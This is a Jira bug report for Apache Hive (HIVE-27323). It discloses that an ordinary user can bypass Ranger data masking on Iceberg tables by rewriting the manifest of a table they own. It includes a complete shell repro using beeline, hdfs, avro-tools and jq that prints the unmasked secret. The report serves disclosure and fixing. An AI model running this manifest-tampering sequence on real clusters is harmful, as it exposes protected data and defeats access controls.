Janos Kovacs created HIVE-27323:
-----------------------------------
Summary: Iceberg: malformed manifest file or list can cause data
breach
Key: HIVE-27323
URL: https://issues.apache.org/jira/browse/HIVE-27323
Project: Hive
Issue Type: Bug
Components: Iceberg integration
Affects Versions: 4.0.0-alpha-2
Reporter: Janos Kovacs
Set to bug/blocker instead of enhancement due to its security related nature,
Hive4 should not be released w/o fix for this. Please reset if needed.
Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals
and can't just be fixed via the storagehandler authorizer.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
non-masked leading to a possible data breach.
* Hive runs with doAs=false to be able to enforce FGAC and prevent end-user
direct file-system access needs
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED
BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see
this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt | icebergsecured.secret |
+------------------------------------+--------------------------------+
| You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user to create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
beeline -e "
DROP TABLE IF EXISTS default.trojanhorseviadata;
CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string)
STORED BY ICEBERG
LOCATION '/some-user-writeable-location/trojanhorseviadata';
INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
"
SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
beeline --outputformat=csv2 --showHeader=false --verbose=false
--showWarnings=false --silent=true --report=false -e "SELECT file_path FROM
default.icebergsecured.files;" 2>/dev/null)
TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null |grep
metadata_location |grep -v previous_metadata_location | awk '{print $5}')
TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep
"manifest-list" |cut -f4 -d\")
hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq
'.manifest_path' |tr -d \")
hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp "$SECURE_DATA_FILE"
'.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > ${TROJAN_MANIFESTFILE}.schema
avro-tools fromjson --codec deflate --schema-file ${TROJAN_MANIFESTFILE}.schema
${TROJAN_MANIFESTFILE}.json > ${TROJAN_MANIFESTFILE}.new
hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION
beeline -e "SELECT * FROM default.trojanhorseviadata;"
+------------------------------------+-----------------------------------+
| trojanhorseviadata.txt | trojanhorseviadata.secret |
+------------------------------------+-----------------------------------+
| You might be allowed to see this. | You are not allowed to see this! |
+------------------------------------+-----------------------------------+
{noformat}
There are actually multiple options to create such table and modify the
manifest/list like reuse parts of the iceberg code or just use spark which
needs direct end-user write access to the file-system, etc.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)